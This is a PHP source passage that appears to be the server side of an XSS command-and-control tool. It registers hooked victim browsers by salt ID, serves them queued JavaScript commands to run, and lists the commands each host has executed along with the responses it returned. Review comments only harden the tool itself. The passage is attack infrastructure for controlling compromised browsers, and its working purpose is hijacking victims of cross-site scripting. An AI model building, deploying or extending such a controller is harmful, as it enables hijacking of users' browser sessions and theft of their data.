// Reply with an empty JavaScript comment and stop; the body is declared as text/javascript.
header('Content-Type: text/javascript; charset=utf-8');
die("/*null*/");
}

// The fourth URI segment must be exactly 50 bytes long; any other length
// gets the same placeholder response.
if (strlen($uri[3]) !== 50) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}

// String ID of the XSS-vulnerable page.
// NOTE(review): only the length of this request-supplied value is checked
// here; confirm that the pmxHost methods bind it as a query parameter
// instead of concatenating it into SQL.
$sid = $uri[3];

$pmxProj = new pmxProject();
$pmxHost = new pmxHost();

// Unknown project salt ID: answer with the placeholder and stop.
if (!$pmxProj->isExistSaltID($saltid)) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}

$pid = $pmxProj->getIDbySlatID($saltid);

/**
 * Decide whether this is the first time the host has come online:
 * a known $sid only has its record updated, an unknown one is added
 * under the project.
 */
if ($pmxHost->isExistSaltID($sid)) {
    $pmxHost->updateHost($sid); // update the host information
} else {
    $pmxHost->addHost($pid, $sid); // add the host
}

// Output whatever getCommand() returns for this host as the JavaScript body.
// A falsy result sends no header and no body at all.
$command = $pmxHost->getCommand($sid);
if ($command) {
    header('Content-Type: text/javascript; charset=utf-8');
    echo $command;
}
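// Nothing below runs unless pmx_validate_token() accepts the request.
if (!pmx_validate_token()) {
    die("Token is incorrect.");
}

$type_allow = array("executed", "waiting"); // allowed types

// Query parameters are untrusted. PHP turns "?sid[]=x" into an array, so any
// value that is not a string is treated as missing instead of being passed
// on to pmxHost.
$sid = (isset($_GET["sid"]) && is_string($_GET["sid"])) ? $_GET["sid"] : NULL;
$type = (isset($_GET["type"]) && is_string($_GET["type"])) ? $_GET["type"] : NULL;
// Maximum number of log entries to render; defaults to 10. A value of zero
// or below renders no entries, because the loop breaks on its first pass.
$top = isset($_GET["top"]) ? intval($_GET["top"]) : 10;

// An empty string counts as missing, exactly like an absent parameter.
// NOTE(review): the checks below only protect the code after them if
// json_out() ends the request — confirm that it does.
if ($sid === NULL || $sid === "" || $type === NULL || $type === "") {
    json_out(0, "sid or type couldn't be NULL.");
}

// Strict comparison: only the exact strings in the allow-list pass.
if (!in_array($type, $type_allow, true)) {
    json_out(0, "Type is invalid.");
}

$pmxHost = new pmxHost();
if (!$pmxHost->isExistSaltID($sid)) {
    json_out(0, "sid is non-existent.");
}

if ($type === "executed") {
    $hostExecutedLogs = $pmxHost->getExecutedLogs($sid);

    // No logs for this host: answer with the placeholder markup. The count is
    // compared directly; a negated form such as "!count(...) > 0" parses as
    // "(!count(...)) > 0" because "!" binds tighter than ">".
    if (count($hostExecutedLogs) === 0) {
        json_out(1, "", "<p><center>Empty</center></p>");
    }

    $html = "";
    $index = 0;
    foreach ($hostExecutedLogs as $hostExecutedLogs_item) {
        // Render at most $top entries.
        if ($index >= $top) {
            break;
        }
        $index++;

        // 'resp' is decoded with objects as associative arrays; json_decode()
        // returns NULL when the stored text is not valid JSON.
        // NOTE(review): presumably 'resp' holds data reported by the remote
        // host — HTML-escape anything taken from it before appending to $html.
        $resp = json_decode($hostExecutedLogs_item['resp'], TRUE);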